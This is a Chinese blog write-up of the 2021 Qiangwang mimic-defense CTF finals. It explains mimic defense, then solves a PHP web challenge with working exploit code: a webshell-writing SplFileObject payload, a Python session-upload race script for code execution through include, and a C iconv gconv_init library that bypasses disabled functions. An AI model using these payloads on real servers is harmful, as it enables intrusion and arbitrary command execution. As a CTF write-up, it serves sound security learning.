2021强网拟态防御国际精英挑战赛总决赛WP

CTFWEB

发布于：2022年1月2日

次浏览

2021强网拟态防御国际精英挑战赛总决赛WP

前三届强网拟态都是国际邀请赛，导致之前没打过这比赛，今年开放线上国际公开赛，Em…..缺乏前几届参赛经验，打进决赛后果然吃大亏hhh

后面队友 @Vino0o0o 搞车联网带到前20三等奖，险吃低保

先吐槽一下，这比赛确实重点不在CTF上，常规CTF解题部分被分在了白盒资格赛上，质量参差不齐，且每道题只有500分（还是动态

而去黑盒或者车联网挖一些简单的洞(如弱口令)都能评几千分。因为CTF题目得分过低，就导致了后面基本都跑去做黑盒、白盒挑战和车联网去了，解题赛大家进度都非常慢，站在Ctfer的角度来看这是缺乏合理性的

但总体来看拟态强网还是一次很不错的锻炼机会，能够一定程度上拓展安全视野，为数不多的打完觉得学到很多的比赛

拟态简述

不知道表述有无问题，敬请予正

赛中一直能在题目信息中看到异构、执行体、冗杂体等等拟态概念，迷迷糊糊也就照着正常Web业务来做了，赛后才大概了解拟态到底是什么东西

简单吹一下

先说执行体，当存在一个如后台管理系统的网站，他可能由单独的PHP实现，也可能由Django实现，同理也可能由Node Or Java实现，这种单个网站放在拟态网站中就称为执行体

而冗杂体就是由这些执行体组合起来的集合，最外层套一个Nginx反向代理之类的东西把流量向内网中的执行体转发，假如Python实现的后台管理存在SSTI，则输入49，Python执行体返回的网页将会出现49，而其他执行体不会有这样的返回，因此判定该输入为攻击输入从而进行拦截（少数服从多数）

因此由上也不难明白异构是什么东西。

同理，存在语言异构，就还会有其他种类异构，如不同操作系统异构(Win、CentOS、Debian….)，不同位数和架构的CPU异构等等(intel、arm)

简而言之拟态网站就是一个由多种服务器构成的服务集群统一体，通过比较同业务不同返回来触发拟态防御机制

白盒资格赛

就是CTF解题赛

不要做小白

打开是个静态页面，扫东西只有个phpinfo.php

忘了具体源码了，直接用%fa绕escapeshellarg即可

看一下大概ban了三页的函数（恼

然后就没其他可利用点了，逛了会儿发现注释有个xiaobai.php

把扫描器关键词加个xiaobai，直接扫出xioabai.zip

xiaobai.php

<?php
include 'fun.php';

error_reporting(0);

if(!isset($_GET['do'])){
    echo "do what?";
}
else if($_GET['do'] == "think"){
    if(strlen($_GET['think']) > 10 | fun($_GET['think'], 1) | check($_GET['think'])) 
        exit("think what?");
    eval($_GET['think']);
}

if(isset($_GET['show'])){
    if(strlen($_GET['show']) > 42 | fun($_GET['show'])) 
        exit("show what?");
    include $_GET['show'];
}

fun.php

<?php

function fun($var, $case = 0): bool{
    $blacklist = ["\$_", "eval", "include", "require", "?", ":", "^", "+", "-", "%", "*"];

    foreach($blacklist as $blackword){
        if(strstr($var, $blackword)) return True;
    }

    if($case){
        $oppos = ["php","/","\$"];
        foreach($oppos as $blackword){
            if(strstr($var, $blackword)) return True;
        }
    }

    return False;
}

function check($var): bool{
    $alphadic = 'abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ';
    $cnt = 0;
    for($i = 0; $i < strlen($alphadic); $i++){
        for($j = 0; $j < strlen($var); $j++){
            if($var[$j] == $dic[$i]){
                $cnt += 1;
                if($cnt > 4) return True;
            }
        }
    }
    return False;
}

简短的代码，这里的eval是个幌子，我们需要直接用include，加上session文件上传来getshell

逛了下之前的phpinfo，命令/代码执行函数就剩个eval，连var_dump、is_dir这类函数都被ban了

看了下没有禁SPL，那就直接用SPL来写文件

1	<?php $file = new SplFileObject("/tmp/g", "w");$written = $file->fwrite("<?php eval(\$_POST[1]);"); ?>

跑phpinfo临时文件上传但太慢了没跑出来，贴一下队友的session上传

import threading
import requests
from concurrent.futures import ThreadPoolExecutor, wait

target = 'http://172.35.45.1/xiaobai.php'
session = requests.session()
flag = '1111'


binFile=open("exp.so",'rb');


def upload(e: threading.Event):
    files = [
        ('file', ('load.png', b'a' * 40960, 'image/png')),
    ]
    data = {'PHP_SESSION_UPLOAD_PROGRESS': rf'''<?php echo('{flag}');$file = new SplFileObject("/tmp/f", "w");$written = $file->fwrite("exp的so"); ?>'''}

    while not e.is_set():
        requests.post(
            target,
            data=data,
            files=files,
            cookies={'PHPSESSID': flag},
        )


def write(e: threading.Event):
    while not e.is_set():
        response = requests.get(
            f'{target}?show=/var/lib/php/sessions/xiaobai/sess_{flag}',
        )

        if flag.encode() in response.content:
            print(response.content)
            e.set()


if __name__ == '__main__':
    futures = []
    event = threading.Event()
    pool = ThreadPoolExecutor(15)
    for i in range(10):
        futures.append(pool.submit(upload, event))

    for i in range(5):
        futures.append(pool.submit(write, event))

    wait(futures)

跑完然后直接引用/tmp/g过来即可代码执行

拿下webshell后还是无法拿到flag，要绕一下DF

PHP7.4

重新回去看了一下发现没有ban putenv，但disable class里面赫然列着一个FFI

嗯…..那就要找其他方法了，这里用的是iconv

#include <stdio.h>
#include <stdlib.h>

void gconv() {}

void gconv_init() {
  system("cd /;./flag>tmp/2");
}

编译出exp.so，写一个文件上传的接口上去

1	$file = new SplFileObject("/tmp/ttpfx", "w");$written = $file->fwrite('<?php $file = new SplFileObject("/tmp/exp.so", "w");$written = $file->fwrite($_POST["file"]);?>');